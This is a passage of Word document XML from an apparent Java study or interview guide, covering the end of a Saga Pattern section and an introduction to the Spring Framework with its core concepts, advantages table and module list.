          <w:ilvl w:val="0"/>
          <w:numId w:val="1842"/>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Eventual Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the system doesn’t require strict ACID properties and can tolerate eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD170DA" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1842"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resilient Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to ensure that failures in one service do not cause the whole system to fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3630A" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is crucial in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, enabling them to handle distributed transactions with greater resilience and flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B056F" w14:textId="725F0B95" w:rsidR="008D0DCC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008D0DC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lastRenderedPageBreak/>
        <w:pict w14:anchorId="108C5329">
          <v:rect id="_x0000_i2037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F5D816" w14:textId="77777777" w:rsidR="00D55EBE" w:rsidRPr="00CE4B95" w:rsidRDefault="00D55EBE" w:rsidP="00D55EBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F5152D" w14:textId="77777777" w:rsidR="00516033" w:rsidRPr="00CE4B95" w:rsidRDefault="00516033">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADBE85" w14:textId="4865EAFF" w:rsidR="00F80B96" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="005C6E50">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="_Toc196307901"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="421"/>
    </w:p>
    <w:p w14:paraId="5E86E422" w14:textId="77777777" w:rsidR="006513B8" w:rsidRPr="00CE4B95" w:rsidRDefault="006513B8" w:rsidP="006513B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767801AC" w14:textId="22F8224F" w:rsidR="00185359" w:rsidRPr="00CE4B95" w:rsidRDefault="00F84289" w:rsidP="00185359">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="422" w:name="_Toc196307902"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring Framework? What are its advantages</w:t>
      </w:r>
      <w:r w:rsidR="00185359" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="422"/>
    </w:p>
    <w:p w14:paraId="460FA82E" w14:textId="5E586C0F" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="006926BB">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pring Framework is a powerful, lightweight, and open-source Java framework used to build enterprise-grade applications. It provides infrastructure support for developing Java applications and promotes loose coupling through Dependency Injection (DI) and Aspect-Oriented Programming (AOP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3D95B" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A423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76C5807">
          <v:rect id="_x0000_i2038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6606F" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A4235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re Concepts of Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE5D23" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00D32872">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 xml:space="preserve">IoC (Inversion of Control): </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring manages object creation and lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7E740" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00D32872">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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I (Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>): Promotes loose coupling by injecting dependencies instead of hard-coding them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF4C6F" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00D32872">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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OP (Aspect-Oriented Programming):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Separates cross-cutting concerns like logging, security, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B3EB0F" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00D32872">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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odular Architecture:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Includes modules like Spring Core, Spring MVC, Spring Data, Spring Security, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D62C8" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A423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79DEAE">
          <v:rect id="_x0000_i2039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD385AC" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A42353">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Advantages of Spring Framewor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02"/>
        <w:gridCol w:w="6802"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="212E401A" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CBBEA6F" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00D22572">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6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="201D5AB9" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00D22572">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A42353" w:rsidRPr="00CE4B95" w14:paraId="413D4774" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="065DF792" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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ghtweight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DEF5283" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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is lightweight in terms of size and overhead.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="3553FC39" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66EAFB24" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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osely Coupled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FB1714A" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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s Dependency Injection to decouple application objects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="088E743D" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FFF676" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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dular</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039F1252" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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velopers can use only the modules they need (e.g., Spring Boot, Spring Security, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="41F76C6D" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C0DEE39" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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estable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D78E50A" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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courages writing testable code with support for JUnit and Mockito.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="2762D6A8" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C07697D" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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grated with other frameworks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5366BCB9" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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orks well with Hibernate, JPA, JMS, Quartz, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="4EDDE020" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D1AF85" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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spect-Oriented Programming (AOP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2847358B" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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eanly separates concerns like logging, transactions, and security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="71DC7F1E" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30EC022B" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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ansaction Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="691BFD97" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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ovides abstraction over various transaction APIs like JTA, JDBC, Hibernate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="782EE849" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33058601" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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VC Web Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75F2A19D" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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MVC is a robust model-view-controller web framework.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="530DD0D0" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A923A39" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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Boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D0605F" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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apid application development with embedded servers and auto-configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="2DBE65C6" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54108D29" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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curity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A043051" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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Security offers powerful authentication and authorization mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="757F29B9" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C53284E" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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munity &amp; Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D3E2E33" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A4235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arge community support and excellent documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A709E30" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A423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60A6C2">
          <v:rect id="_x0000_i2040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D715434" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A42353">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Spring Modules Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB834A5" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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core: Core container and DI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C86B0C" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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context: Application context features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF5B50" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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aop: Aspect-oriented programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571EEF7E" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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jdbc: JDBC and DataSource support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D69009" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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tx: Transaction management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A608C40" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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orm: Integration with ORM tools like Hibernate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F14B11" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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web: Web integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9A085" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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mvc: Web MVC framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFE3E2" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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security: Authentication and authorization.</w:t>
      </w:r>
    </w:p>
